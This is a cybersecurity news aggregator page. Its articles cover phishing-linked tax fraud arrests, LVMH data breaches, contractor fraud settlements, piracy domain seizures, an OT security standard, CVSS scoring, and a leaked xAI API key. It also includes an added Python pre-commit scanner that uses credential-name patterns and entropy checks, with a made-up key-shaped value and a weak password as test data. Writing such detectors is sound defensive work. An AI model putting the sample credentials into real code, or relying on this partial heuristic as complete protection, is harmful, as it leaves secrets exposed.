Cyber security aggregate rss news

Cyber security aggregator - feeds history

image for 13 Arrested in Roman ...

 Cyber News

Thirteen individuals have been arrested in Romania as part of a major international operation targeting tax fraud linked to phishing attacks. The suspects are believed to have used stolen personal data to make fraudulent claims for tax refunds and benefits in the UK. The arrests follow a coordinated investigation involving more than 100 Romanian police officers and criminal investigators from HM Revenue and Customs (HMRC). The suspects, aged between 23 and 53, were detained in the Romanian counties of Ilfov, Giurgiu, and Calarasi.

A separate arrest was also made in Preston, UK. A 38-year-old man was taken into custody in connection with the same investigation. Officers from HMRC seized electronic devices and are continuing to question him.

The international investigation is the result of a joint effort between Romanian prosecutors, HMRC, and the UK’s Crown Prosecution Service (CPS). This partnership was set up earlier this year to investigate serious cross-border crimes involving cyber fraud and financial misconduct.

Phishing and Tax Fraud Operation

According to HMRC, the criminal operation involved the theft of personal data through phishing attacks. Criminals used this information to submit fraudulent PAYE (Pay As You Earn) claims, VAT repayments, and Child Benefit payment requests. The Romanian Police’s Economic Crimes Investigation Directorate led the arrests. The suspects are being investigated for offences including computer fraud, money laundering, and illegal access to a computer system. HMRC emphasized that the fraud did not involve a direct cyberattack on its systems. Rather, criminals used data gathered through phishing and other means to exploit HMRC services.

UK Arrest and Ongoing Investigations

The 38-year-old man arrested in Preston remains in custody. He is being questioned as part of a separate but related investigation. The operation also included the seizure of electronic devices that may be key to uncovering further details about the criminal network. Two other men, aged 27 and 36, had previously been arrested in Bucharest in November on suspicion of cybercrime and fraud offences. Those investigations are ongoing.

Simon Grunwell, Operational Lead in HMRC’s Fraud Investigation Service, praised the international effort and the progress made so far. “These arrests show we work across borders with our international partners to combat tax crime in all its forms. We have a number of live criminal investigations, and we are grateful to our Romanian partners for their support. We have already acted to protect customers after identifying attempts to access a very small minority of tax accounts, and we continue to work with other law enforcement agencies both in the UK and overseas to bring those responsible to justice.”

How HMRC Responded

HMRC has written to around 100,000 people, approximately 0.22% of its customer base, to inform them of attempted unauthorized access to their accounts. These individuals were reassured that their accounts were secured and that no financial losses had occurred. The organization clarified that this was not a cyberattack on HMRC’s systems. Instead, the criminals used stolen information, likely obtained from phishing or data leaks involving other organizations, to access HMRC services fraudulently. HMRC stressed its commitment to security and noted that it is continuously upgrading its systems. As part of the UK government’s June 2025 Spending Review, further investment was announced to strengthen the security of HMRC’s IT infrastructure.

HMRC Among Most Spoofed Government Bodies

According to the National Cyber Security Centre, HMRC was the third most spoofed UK government agency in 2022, after the NHS and TV Licensing. Phishing attempts that impersonate HMRC remain common and pose an ongoing risk to taxpayers. To help the public stay safe, HMRC encourages individuals to report any suspicious emails, texts, or messages. You can report a scam or phishing attempt online via the official HMRC channels.

Conclusion

The arrests highlight the growing need for cross-border cooperation to tackle cyber-enabled financial crimes. The joint investigation team formed between the UK and Romania allowed authorities to share intelligence, resources, and expertise. By working together, law enforcement agencies were able to act swiftly against organized groups operating across multiple countries. This kind of collaboration is essential in disrupting sophisticated fraud operations that can otherwise evade national borders.

Authorities continue to warn people about the risks of phishing scams. Criminals often send fake emails or text messages that appear to come from trusted sources like HMRC. These messages can trick individuals into sharing sensitive personal or financial information. HMRC advises everyone to be cautious of unexpected requests for information and never to click on suspicious links. Anyone who suspects they have been targeted by a scam should report it immediately.

image for Third Time in 90 Day ...

 Firewall Daily

Louis Vuitton has sent an email to its customers detailing a cyberattack that exposed personal information, the third such incident in 90 days. The latest LVMH cyberattack occurred on July 2, 2025, and adds to a string of security incidents linked to LVMH brands since May. The previous LVMH cyberattack, involving Louis Vuitton Korea, took place on June 8, 2025, when an unauthorized third party accessed internal systems and extracted customer data. While no financial information, such as credit card numbers or banking details, was compromised, Louis Vuitton stated that the LVMH cyberattack has been contained and that steps are being taken to reinforce its cybersecurity measures.

Third LVMH Cyberattack Confirmed

In a customer notification email, the company revealed that names, contact details, and purchase histories had been exposed in the LVMH cyberattack. As with the previous LVMH cyberattacks, no financial or payment data was compromised. Louis Vuitton has notified the UK Information Commissioner’s Office, as required by local data protection regulations, and is working directly with affected individuals. This UK-based incident marks the third LVMH cyberattack in just 90 days, following earlier breaches at Christian Dior Couture and Louis Vuitton Korea. Although no cybercriminal group has taken responsibility, the close timing of the events has drawn industry attention. Customers are being advised to be especially wary of phishing attempts. Scammers may use references to recent purchases, loyalty accounts, or exclusive promotions to trick individuals into revealing more sensitive data.

Louis Vuitton Korea Issues Apology and Launches Investigation

In a formal statement, the fashion brand said it deeply regretted the Louis Vuitton Korea data breach and had taken immediate action to secure its systems. The company reported the breach to relevant government authorities and has engaged cybersecurity experts to support the investigation and strengthen its defenses. Translated from Korean: “We regret to inform you that an unauthorized third party temporarily accessed our system and leaked some customer information. Fortunately, financial information such as passwords, credit card details, and bank account numbers were not included in the leaked data.”

Louis Vuitton also emphasized the importance of vigilance, urging customers to be cautious of suspicious communications and avoid sharing sensitive credentials. “We remind customers never to share their Louis Vuitton passwords, as we do not request them under any circumstances,” the company noted.

What Information Was Exposed in the Louis Vuitton Korea Data Breach?

According to the internal investigation, the information exposed in the Korea LVMH cyberattack may vary by individual but could include names, surnames, contact details, and other data provided voluntarily by customers. The breach was discovered and confirmed by the company on July 2, following the unauthorized access that occurred in early June. This latest Louis Vuitton Korea cyberattack follows a similar incident involving Christian Dior Couture, another LVMH brand, in May 2025. Dior reported that an “unauthorized external party” had accessed customer data earlier in the year. French newspaper Le Monde later reported that the Dior breach took place in January and affected customers in Asia. Neither brand disclosed any loss of financial information.

Caution Urged Amid Rise in Threats

Following the cyberattack on Louis Vuitton Korea, cybersecurity professionals are warning that high-end retail brands are becoming increasingly attractive targets for hackers. Although financial data was not taken, access to personal information can enable phishing attempts, social engineering scams, and identity theft. The company’s Korean-language announcement also included a strong warning to customers: “Given the nature of the exposed information, we advise customers to exercise caution regarding unexpected communications or suspicious messages. Please do not share your Louis Vuitton password with anyone.”

Louis Vuitton Korea stated it is now working with “top cybersecurity experts” to upgrade its system defenses and prevent further incidents. While the company had implemented comprehensive security protocols before the attack, this event highlights how cyber threats are targeting fashion brands. “We are prioritizing the protection of our customers’ personal information and are doing everything possible to prevent such incidents from recurring,” the company assured. With three LVMH brands now confirmed as cyberattack victims (Christian Dior Couture, Louis Vuitton Korea, and now Louis Vuitton UK), attention is turning toward the conglomerate’s overall cybersecurity strategy and whether additional vulnerabilities remain unaddressed.

image for Federal IT Contracto ...

 Compliance

A Maryland-based IT firm, Hill ASC Inc., has agreed to pay at least $14.75 million in a settlement that puts federal IT contractors under scrutiny. This isn't just about money but a reminder that cutting corners on IT services for Uncle Sam carries a hefty price, especially when national security is on the line.

The U.S. Department of Justice on Monday revealed that Hill Associates allegedly billed federal agencies for IT staff who simply didn't meet the contractually required experience or education. For five years, from 2018 to 2023, the company operated under a General Services Administration (GSA) program, a pipeline meant to get top-tier commercial services to the government efficiently. Investigators also claimed Hill Associates submitted invoices for specific cybersecurity services despite failing a critical technical evaluation. The GSA demands these rigorous assessments for contractors offering highly adaptive cybersecurity solutions to government clients. Not passing such an evaluation points to significant gaps in the company's advertised capabilities. The firm reportedly charged unauthorized fees and neglected to give government customers crucial information about prompt payment discounts. Additionally, Hill Associates included unallowable incentive compensation within a cost submission for a new contract proposal, further muddying its billing practices.

Cybersecurity experts stress that strict oversight of government IT contracts is essential. Agencies depend on contractors to uphold the highest standards, particularly when services directly impact federal operations and critical data integrity. Any slip from agreed-upon terms, whether unqualified personnel or misrepresented capabilities, erodes trust and opens doors for potential vulnerabilities. "Federal agencies should get what they have paid for from GSA contractors, nothing less," GSA’s Deputy Inspector General, Robert Erickson, said. This sentiment resonates deeply within the cybersecurity community, where the quality of IT infrastructure and the expertise of its stewards directly influence national security and operational resilience. Loren Sciurba, Treasury Deputy Inspector General, added that "false claims and similar unfair advantage by contractors undermine the integrity of the contracting process and can result in significant adverse effects to vital security concerns." The implications stretch far beyond mere financial misconduct; subpar IT services can expose federal systems to advanced persistent threats (APTs) and sophisticated nation-state hackers.

In addition to the settlement payment, Hill Associates also agreed to pay 2.5% of its annual gross revenue exceeding $18.8 million beginning next year. The allegations were filed under the False Claims Act, a U.S. federal law that imposes liability on individuals and companies who defraud the government. In fiscal year 2024, the DOJ recovered over $2.9 billion from civil cases involving fraud and false claims.

Another defense contractor that settled with the DOJ earlier this year was Morse Corp Inc., a Massachusetts-based company. The contractor agreed to pay $4.6 million to resolve allegations of cybersecurity fraud that involved the company misrepresenting its compliance with federal cybersecurity standards while working on contracts with the Departments of the Army and Air Force. According to the settlement agreement, Morse Corp submitted a misleading score of 104 on its cybersecurity assessment to the Department of Defense’s Supplier Performance Risk System (SPRS) in January 2021. However, an independent evaluation in July 2022 revealed a significantly lower score of -142, indicating that the company had only implemented 22% of the required controls.

While Hill Associates and Morse Corp. agreed to pay and settle without admitting liability, the cases shine a bright light on a persistent challenge in public sector contracting. Ensuring vendors truly possess the stated qualifications and deliver services as promised is fundamental to robust cloud security and strong application security. This vigilance protects against future data breaches and maintains the integrity of critical government systems.

image for FBI Seizes NSW2U, PS ...

 Cyber News

The FBI's Atlanta Field Office has seized several major online platforms involved in video game piracy. These websites offered pirated versions of popular video games, many of them made available before their official release dates. Alongside the seizures, the FBI also dismantled the websites' supporting infrastructure, effectively shutting down the operations behind these platforms.

According to the agency, these sites have been active for over four years. During this period, they made available pirated copies of new and upcoming games. These unauthorized downloads gave users early access to titles that had not yet reached the market. Between February 28 and May 28, 2025, records show that users downloaded pirated games 3.2 million times from the most commonly used service on these platforms. The estimated financial loss from these activities is around $170 million.

FBI Takes Over Domains Hosting Illegal Game Downloads

As part of the takedown, the FBI has obtained legal authorization to seize the domains of multiple websites. These include:

nsw2u.com
nswdl.com
game-2u.com
bigngame.com
ps4pkg.com
ps4pkg.net
mgnetu.com

These domains were used to host and share pirated video games. Visitors to any of these sites will now see a seizure notice, indicating that the U.S. federal authorities have taken control of the domains. The FBI extended its thanks to international partners. “The FBI would like to thank the Dutch FIOD for their assistance in this investigation,” the agency stated.

Nsw2u Among the Most Popular

One of the most visited sites, nsw2u, has sparked strong reactions from the online gaming community. For years, gamers used the site to download pirated versions of games for hacked Nintendo Switch devices. In addition to Nintendo Switch titles, the platform also offered PC games. The platform’s popularity did not go unnoticed by global authorities. In May 2025, the European Union added nsw2u to its Counterfeit and Piracy Watch List. The EU said game publishers and industry stakeholders had reported the site for distributing unauthorized content. “Operators of these domains are reported not to have reacted to requests by right holders to end the illegal activities,” EU officials stated in the report. As a result of the mounting legal pressure, several European countries passed rules to block access to nsw2u and its related domains. These included the United Kingdom, Spain, Portugal, Italy, Germany, and France. In February 2025 alone, the site saw approximately 2.3 million global visits, underscoring the scale and reach of its operations.

Industry Pushback and Global Enforcement

The piracy crackdown has not gone unnoticed by industry leaders. In 2021, the Entertainment Software Association (ESA), representing companies like Nintendo, Microsoft, and others, sent a formal letter to the Office of the U.S. Trade Representative. The letter cited nsw2u as a platform that repeatedly ignored takedown notices and failed to cooperate with copyright enforcement. Despite the ESA’s concerns, Nintendo and Sony, the makers of the Nintendo Switch and PlayStation consoles, respectively, did not provide public comments regarding their role in the current operation. Law enforcement across the U.S. and Europe has increased its efforts in recent years to fight online piracy. Over the past three years, several major actions have been launched to stop illegal distribution of digital content.

Growing Tensions Between Users and Authorities

While the authorities celebrate the success of this latest operation, not everyone is happy. Many users expressed frustration online, especially those who had relied on the sites for years to access games without paying. Some members of the gaming community defended their actions by citing high game prices and limited access in certain regions. Others argued that piracy platforms gave players a chance to try games before deciding whether to buy them. However, authorities continue to stress the economic harm caused by piracy. With an estimated loss of $170 million in just three months, game publishers face serious financial threats. Piracy can impact game development budgets, reduce profits, and limit future investments in new projects.

Conclusion

By disabling the websites and seizing their domains, the FBI has effectively ended access to some of the most used piracy platforms for video games. While some may try to recreate these websites or shift to new domains, law enforcement agencies are working faster and more efficiently than ever before. For now, the FBI’s success in shutting down these websites sends a strong message: piracy is not without consequence, and illegal distribution of games will be met with serious legal action.

image for Australia Adopts Glo ...

 Regulations

Australia just made a significant move to future-proof its critical infrastructure and beef up its OT cybersecurity standard. It has officially adopted the internationally recognized IEC 62443 series as the national standard—branded locally as AS IEC 62443—for securing Operational Technology (OT) systems against cyber threats. The decision comes at a time when the stakes for protecting industrial systems are higher than ever. From power grids and water treatment plants to transportation systems and hospital devices, OT networks form the digital backbone of the country’s most vital services. And cybercriminals know it.

Why IEC 62443 Matters

Unlike traditional IT systems, OT environments—also called Industrial Automation and Control Systems (IACS)—can’t afford downtime. A compromised SCADA system controlling water pressure or a PLC managing a railway switch doesn’t just lose data; it can endanger lives, communities, and the environment. OT demands a specialized approach, one that understands the physics of industrial processes as much as the logic of network packets. That’s where IEC 62443 comes in. Developed by the IEC’s Technical Committee 65, the framework provides a modular, role-based cybersecurity playbook specifically designed for industrial environments. Think of it as the NIST of OT, but with tighter alignment to physical safety and real-world operational needs. With its adoption as AS IEC 62443, Australia has now aligned its national security posture with one of the world’s most robust and practical frameworks for OT cyber defense.

What’s Actually in the Standard?

The beauty of AS IEC 62443 lies in its flexibility. It breaks down the complex OT landscape into components tailored for three main audiences:

Asset Owners: the companies running the infrastructure
Service Providers: vendors maintaining or integrating technology
Product Suppliers: hardware and software vendors building the underlying systems

The standard maps to the system lifecycle, meaning organizations can start with the basics—like risk assessments and segmentation—and evolve their controls as they scale or modernize. What makes this standard particularly powerful for Australia?

Modular and Role-Based: It’s not a one-size-fits-all straitjacket. Businesses can pick and choose the relevant parts based on their specific responsibilities (whether they own assets, provide services, or supply products) and the lifecycle stage of their systems. This pragmatism is key to actual implementation, not just theoretical compliance.
Alignment with Local Regulations: The standards are designed to dovetail with existing Australian regulatory requirements, making the transition from framework to practical application smoother and more effective across diverse sectors.

Why a New OT Cybersecurity Standard Now?

This adoption isn’t just a checkbox move—it’s a direct response to a rising tide of cyberattacks on critical infrastructure worldwide. In the last 24 months alone, Australia has witnessed cyber incidents targeting water utilities, transportation networks, and even its healthcare systems. Globally, we’ve seen OT threats like Colonial Pipeline, the Oldsmar water plant attack, and disruptions to Ukraine’s power grid, which show just how vulnerable physical systems have become. By adopting AS IEC 62443, Australia is signaling that it takes these threats seriously—and is committed to building resilience across both legacy and modern infrastructure.

Smart Cities, Smart Risk Management

The timing also aligns with Australia’s broader push toward smart infrastructure. The IEC is already preparing updates to 62443, including a new Part 1-6 module focused on the Industrial Internet of Things (IIoT). That means better security baselines for smart energy grids, autonomous transport systems, and connected city infrastructure. This isn’t just about defense—it’s about building digital trust into the systems that will define Australia’s economic and societal future. For utilities, telcos, and manufacturers managing OT environments, the message is clear: get on board. Now! Organizations that adopt AS IEC 62443 not only gain better cyber hygiene—they also minimize reputational risk and unlock access to future energy markets like peer-to-peer grid participation. Consumers, regulators, and investors are watching, and cyber maturity is becoming a competitive differentiator.

In a world where ransomware gangs and state-sponsored actors are targeting the very systems that keep the lights on and the water flowing, Australia’s move is more than timely. It’s foundational. It's a clear signal that the nation understands the real stakes in the cyber war and is prepared to fortify its industrial heartbeat against any coming storm.

image for What you need to kno ...

 Business

This year marks the 20th anniversary of the Common Vulnerability Scoring System (CVSS), which has become a widely accepted standard for describing software vulnerabilities. Despite decades of use and four generations of the standard — now at version 4.0 — CVSS scoring rules continue to be misused, and the system   show more ...

itself remains the subject of intense debate. So, what do you need to know about CVSS to effectively protect your IT assets? The CVSS Base Score According to its developers, CVSS is a tool for describing the characteristics and severity of software vulnerabilities. CVSS is maintained by the Forum of Incident Response and Security Teams (FIRST). It was created to help experts speak a common language about vulnerabilities, and to facilitate automatic processing of data on software flaws. Almost every vulnerability published in major vulnerability registries like CVE, EUVD, or CNNVD includes a severity assessment based on the CVSS scale. An assessment typically consists of two main parts: A numerical rating (CVSS score), which shows how severe the vulnerability is on a scale from 0 to 10. A score of 10 means its an extremely dangerous, critical vulnerability. A vector, which is a standardized text string that describes the vulnerabilitys key characteristics. This includes details like whether it can be exploited remotely over a network or only locally, if elevated privileges are needed, how complex it is to exploit, and what aspects (such as availability, integrity, or confidentiality) of the vulnerable system are affected by exploitation. Heres an example using the highly severe and actively exploited vulnerability CVE-2021-44228 (Log4Shell): Base Score 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) Lets break that down: the attack vector is network-based, attack complexity is low, privileges required: none, user interaction isnt required, the scope indicates the vulnerability impacts other system components, and the impact on confidentiality, integrity, and availability is high. Detailed descriptions of each component are available in the CVSS 3.1 and CVSS 4.0 specifications. A crucial part of the CVSS system is its scoring methodology — also known as the calculator, and available for both 4.0 and 3.1. 
By filling in all the vector components, you can automatically get a numerical criticality score. The original CVSS calculation methodology included three metric groups: Base, Temporal, and Environmental. The first group covers the fundamental and unchanging characteristics of a vulnerability, and forms the basis for calculating the CVSS Base Score. The second group includes characteristics that can change over time — such as the availability of published exploit code. The third group is designed for internal organizational use to account for context-specific factors like the vulnerable applications scope or the presence of mitigating security controls in the organizations infrastructure. In CVSS 4.0, the Temporal metrics have evolved into Threat metrics, and a new group of Supplemental metrics has been introduced. Heres how the metrics are interconnected. Software vendors or cybersecurity companies typically assess the Base criticality of a vulnerability (referred to as CVSS-B in the 4.0 specification). They also often provide an assessment related to the availability and public disclosure of an exploit (CVSS-BT in 4.0, and Temporal in 3.1). This assessment is a modified Base Score; therefore CVSS-B can be higher or lower than CVSS-BT. As for the Environmental score (CVSS-BTE), its calculated within a specific organization based on the CVSS-BT, with adjustments made for their unique conditions of using the vulnerable software. The Evolution of CVSS The first two versions of CVSS, released in 2005 and 2007, are hardly used today. While you might still find older CVSS scores for modern vulnerabilities, CVSS 3.1 (2019) and CVSS 4.0 (2023) are the most common scoring systems. However, many software vendors and vulnerability registries arent in a rush to adopt version 4.0, and they continue to provide CVSS 3.1 scores. 
The core idea behind the first CVSS version was to quantify the severity of vulnerabilities via a scoring system — with an initial separation into Base, Temporal, and Environmental metrics. At that stage, the textual descriptions were loosely formalized, and the three groups of metrics were calculated independently. CVSS 2.0 introduced a standardized vector string and a new logic: a mandatory and unchangeable Base score, a Temporal score calculated from the Base score but accounting for changing factors, and an Environmental score used within specific organizations and conditions derived from either the Base or Temporal score. Versions 3.0 and 3.1 added the concept of Scope (impact on other system components). They also more precisely defined parameters related to required privileges and user interaction, and they generalized and refined the values of many parameters. Most importantly, these versions attempted to solidify the fact that CVSS measures the severity of a vulnerability — not the risks it creates. In version 4.0, the creators aimed to make the CVSS metric more useful for business-level assessments of how vulnerabilities impact risk. This is still not a risk metric, though. Attack complexity was split into two distinct components: attack requirements and attack complexity. This highlights the difference between the inherent engineering difficulty of an attack and the external factors or conditions necessary for the attack to succeed. In practical terms, this means a flaw that requires a specific, non-default configuration on the vulnerable product to be exploited will have higher attack requirements and, consequently, a lower overall CVSS score. The often-misunderstood Scope metric, which simply offered yes or no options for impact on other components, has been replaced. Developers have introduced the clearer concept of subsequent systems, which now specifies what aspect of their operation the vulnerability affects. 
Additionally, a range of supporting indicators has been added — such as the automatability of an exploit and the impact of exploitation on human physical safety. The formulas themselves have also undergone substantial revisions. The influence of various components on the numerical threat score has been re-evaluated based on a vast database of vulnerabilities and real-world exploitation data. How CVSS 4.0 is changing vulnerability prioritization For cybersecurity professionals, CVSS 4.0 aims to be more practical and relevant to todays realities. Were facing tens of thousands of vulnerabilities — many of which receive a high CVSS score. This often leads to them being automatically flagged for immediate remediation in many organizations. The problem is, these lists are constantly growing, and the average time to fix a vulnerability is nearing seven months. When vulnerabilities are re-evaluated from CVSS 3.1 to CVSS 4.0, the Base Score for defects with a severity between 4.0 and 9.0 tends to slightly increase. However, for vulnerabilities that were considered critically severe in CVSS 3.1, the score often remains unchanged or even decreases. More importantly, while Temporal metrics had little impact on a vulnerabilitys numerical rating before, the influence of Threat and Environmental metrics is now much more significant. Orange Cyberdefense conducted a study to illustrate this. Imagine a company is tracking 8000 vulnerabilities, and their IT and security teams are required to fix all defects with a Base CVSS score above 8 within a specified timeframe. What percentage of these 8000 real-world vulnerabilities would fall into that category — with or without considering exposure of the exploit to the public (Temporal/Threat adjustment)? The study found that CVSS 4.0, in its base version, assigns a score of 8 or higher to a larger percentage of vulnerabilities (33% compared to 18% in version 3.1). 
However, when adjusted for the availability of exploits, this number drops significantly — leaving fewer truly critical flaws to prioritize (8% versus 10%).

Critical, High, and everything in between

What's the difference between a critical vulnerability and one that's just plain dangerous? A text-based severity rating is part of the specification — but it's not always required in a vulnerability description:

Low Severity: 0.1–3.9
Medium Severity: 4.0–6.9
High Severity: 7.0–8.9
Critical Severity: 9.0–10.0

In practice, many software vendors take a creative approach to these text ratings. They might modify the names or incorporate their own assessments and factors not included in CVSS. A case in point is June's Microsoft Patch Tuesday — specifically CVE-2025-33064 and CVE-2025-32710. The first is described as Important and the second as Critical, yet their CVSS 3.1 scores are 8.8 and 8.1, respectively.


 A Little Sunshine

Marko Elez, a 25-year-old employee at Elon Musk’s Department of Government Efficiency (DOGE), has been granted access to sensitive databases at the U.S. Social Security Administration, the Treasury and Justice departments, and the Department of Homeland Security. So it should fill all Americans with a deep sense of confidence to learn that Mr. Elez over the weekend inadvertently published a private key that allowed anyone to interact directly with more than four dozen large language models (LLMs) developed by Musk’s artificial intelligence company xAI. On July 13, Mr. Elez committed a code script to GitHub called “agent.py” that included a private application programming interface (API) key for xAI. The inclusion of the private key was first flagged by GitGuardian, a company that specializes in detecting and remediating exposed secrets in public and proprietary environments. GitGuardian’s systems constantly scan GitHub and other code repositories for exposed API keys, and fire off automated alerts to affected users. Philippe Caturegli, “chief hacking officer” at the security consultancy Seralys, said the exposed API key allowed access to at least 52 different LLMs used by xAI. The most recent LLM in the list was called “grok-4-0709” and was created on July 9, 2025. Grok, the generative AI chatbot developed by xAI and integrated into Twitter/X, relies on these and other LLMs (a query to Grok before publication shows Grok currently uses Grok-3, which was launched in February 2025). Earlier today, xAI announced that the Department of Defense will begin using Grok as part of a contract worth up to $200 million. The contract award came less than a week after Grok began spewing antisemitic rants and invoking Adolf Hitler. Mr. Elez did not respond to a request for comment. The code repository containing the private xAI key was removed shortly after Caturegli notified Elez via email. However, Caturegli said the exposed API key still works and has not yet been revoked. “If a developer can’t keep an API key private, it raises questions about how they’re handling far more sensitive government information behind closed doors,” Caturegli told KrebsOnSecurity. Prior to joining DOGE, Marko Elez worked for a number of Musk’s companies. 
His DOGE career began at the Department of the Treasury, and a legal battle over DOGE’s access to Treasury databases showed Elez was sending unencrypted personal information in violation of the agency’s policies. While still at Treasury, Elez resigned after The Wall Street Journal linked him to social media posts that advocated racism and eugenics. When Vice President J.D. Vance lobbied for Elez to be rehired, President Trump agreed and Musk reinstated him. Since his re-hiring as a DOGE employee, Elez has been granted access to databases at one federal agency after another. TechCrunch reported in February 2025 that he was working at the Social Security Administration. In March, Business Insider found Elez was part of a DOGE detachment assigned to the Department of Labor. In April, The New York Times reported that Elez held positions at the U.S. Customs and Border Protection and the Immigration and Customs Enforcement (ICE) bureaus, as well as the Department of Homeland Security. The Washington Post later reported that Elez, while serving as a DOGE advisor at the Department of Justice, had gained access to the Executive Office for Immigration Review’s Courts and Appeals System (EACS). Elez is not the first DOGE worker to publish internal API keys for xAI: In May, KrebsOnSecurity detailed how another DOGE employee leaked a private xAI key on GitHub for two months, exposing LLMs that were custom made for working with internal data from Musk’s companies, including SpaceX, Tesla and Twitter/X. Caturegli said it’s difficult to trust someone with access to confidential government systems when they can’t even manage the basics of operational security. “One leak is a mistake,” he said. “But when the same type of sensitive key gets exposed again and again, it’s not just bad luck, it’s a sign of deeper negligence and a broken security culture.”
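The leak described above came from a credential committed in plain text, which is exactly the class of mistake a local pre-commit check catches before a public scanner like GitGuardian's ever sees it. As an added example (not code from the article, from GitGuardian, or from any DOGE repository), the following Python flags quoted literals assigned to credential-looking names when the literal has the high character entropy of a random key. The staged diff and the key-shaped value in it are constructed for this example; the value is random filler, not a real credential, and its format is not xAI's.

```python
import math
import re
from collections import Counter
from typing import List, Tuple

# Any assignment (Python, shell, JSON, YAML) of a quoted literal of 16+ characters.
ASSIGNMENT = re.compile(
    r"""['"]?(?P<name>[A-Za-z_]\w*)['"]?\s*[=:]\s*['"](?P<value>[^'"]{16,})['"]"""
)
# Only assignments to names that look like they hold a credential are of interest.
CREDENTIAL_WORDS = re.compile(r"key|secret|token|passw", re.IGNORECASE)


def shannon_entropy(s: str) -> float:
    """Bits per character: random API keys sit well above 3.5, prose and placeholders below."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_for_secrets(text: str, min_entropy: float = 3.5) -> List[Tuple[int, str, str]]:
    """Return (line number, variable name, masked value) for each likely hard-coded credential."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in ASSIGNMENT.finditer(line):
            name, value = match.group("name"), match.group("value")
            if not CREDENTIAL_WORDS.search(name):
                continue
            if shannon_entropy(value) >= min_entropy:
                # Mask before reporting so the scanner's own output does not leak the secret.
                findings.append((lineno, name, value[:4] + "..." + value[-2:]))
    return findings


# Constructed sample: the added lines of a diff for a script like the one in the story.
# The key-shaped value is random filler made up for this example, not a real credential.
STAGED_DIFF = "\n".join([
    "+import requests",
    '+XAI_API_KEY = "q8Zr2LwXk9vTpH4sYb7NcJ3mQf6Ua1Dg"',
    '+MODEL = "grok-3"',
    '+password = "changemechangeme"',
    '+resp = requests.post(URL, headers={"Authorization": "Bearer " + XAI_API_KEY})',
])

if __name__ == "__main__":
    hits = scan_for_secrets(STAGED_DIFF)
    for lineno, name, masked in hits:
        print(f"line {lineno}: {name} = {masked}  <- do not commit")
    raise SystemExit(1 if hits else 0)  # as a pre-commit hook, any hit blocks the commit
```

The entropy threshold is what keeps the check quiet on ordinary strings, but it is also its blind spot: the low-entropy `password = "changemechangeme"` line is not reported at the default threshold, so a real hook pairs this heuristic with provider-specific key patterns and a deny-list of known weak values.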


 Feed

Since surfacing on GitHub in 2019, AsyncRAT has become a poster child for how open source malware can democratize cybercrime, with a mazelike footprint of variants available across the spectrum of functionality.

 Feed

The North Korean threat actors linked to the Contagious Interview campaign have been observed publishing another set of 67 malicious packages to the npm registry, underscoring ongoing attempts to poison the open-source ecosystem via software supply chain attacks. The packages, per Socket, have attracted more than 17,000 downloads, and incorporate a previously undocumented version of a malware

 Feed

Governmental organizations in Southeast Asia are the target of a new campaign that aims to collect sensitive information by means of a previously undocumented Windows backdoor dubbed HazyBeacon. The activity is being tracked by Palo Alto Networks Unit 42 under the moniker CL-STA-1020, where "CL" stands for "cluster" and "STA" refers to "state-backed motivation." "The threat actors behind this

 Feed

AI agents promise to automate everything from financial reconciliations to incident response. Yet every time an AI agent spins up a workflow, it has to authenticate somewhere; often with a high-privilege API key, OAuth token, or service account that defenders can’t easily see. These “invisible” non-human identities (NHIs) now outnumber human accounts in most cloud environments, and they have

 Feed

Cybersecurity researchers have charted the evolution of a widely used remote access trojan called AsyncRAT, which was first released on GitHub in January 2019 and has since served as the foundation for several other variants. "AsyncRAT has cemented its place as a cornerstone of modern malware and as a pervasive threat that has evolved into a sprawling network of forks and variants," ESET

 Feed

Cloudflare on Tuesday said it mitigated 7.3 million distributed denial-of-service (DDoS) attacks in the second quarter of 2025, a significant drop from 20.5 million DDoS attacks it fended off the previous quarter. "Overall, in Q2 2025, hyper-volumetric DDoS attacks skyrocketed," Omer Yoachimik and Jorge Pacheco said. "Cloudflare blocked over 6,500 hyper-volumetric DDoS attacks, an average of 71

 Feed

Cybersecurity researchers have shed light on a new ransomware-as-a-service (RaaS) operation called GLOBAL GROUP that has targeted a wide range of sectors in Australia, Brazil, Europe, and the United States since its emergence in early June 2025. GLOBAL GROUP was "promoted on the Ramp4u forum by the threat actor known as '$$$,'" EclecticIQ researcher Arda Büyükkaya said. "The same actor controls

 AI

In episode 59 of The AI Fix, our hosts ponder whether AIs need a “disagreement dial”, Mark wonders what he could do with an AI-powered “drug design engine”, Graham plays Wolfenstein instead of working, a robot graduates from high school, and a popular rock group is unmasked as an AI fever dream. Graham explains why Grok thinks it’s Mecha Hitler, and Mark reveals which AI is most likely to betray you. All this and much more is discussed in the latest edition of "The AI Fix" podcast by Graham Cluley and Mark Stockley.

 Cyber Security News

Source: thehackernews.com – Author: . While phishing and ransomware dominate headlines, another critical risk quietly persists across most enterprises: exposed Git repositories leaking sensitive data, a risk that silently creates shadow access into core systems. Git is the backbone of modern software development, hosting millions of repositories and serving thousands of organizations worldwide. Yet, amid […] The entry "The Unusual Suspect: Git Repos" (Source: thehackernews.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com – Author: . Threat actors behind the Interlock ransomware group have unleashed a new PHP variant of their bespoke remote access trojan (RAT) as part of a widespread campaign using a variant of ClickFix called FileFix. “Since May 2025, activity related to the Interlock RAT has been observed in connection with the LandUpdate808 […] The entry "New PHP-Based Interlock RAT Variant Uses FileFix Delivery Mechanism to Target Multiple Industries" (Source: thehackernews.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com – Author: . In cybersecurity, precision matters, and there’s little room for error. A small mistake, missed setting, or quiet misconfiguration can quickly lead to much bigger problems. The signs we’re seeing this week highlight deeper issues behind what might look like routine incidents: outdated tools, slow response to risks, and the ongoing gap […] The entry "⚡ Weekly Recap: Scattered Spider Arrests, Car Exploits, macOS Malware, Fortinet RCE and More" (Source: thehackernews.com) was first published on CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

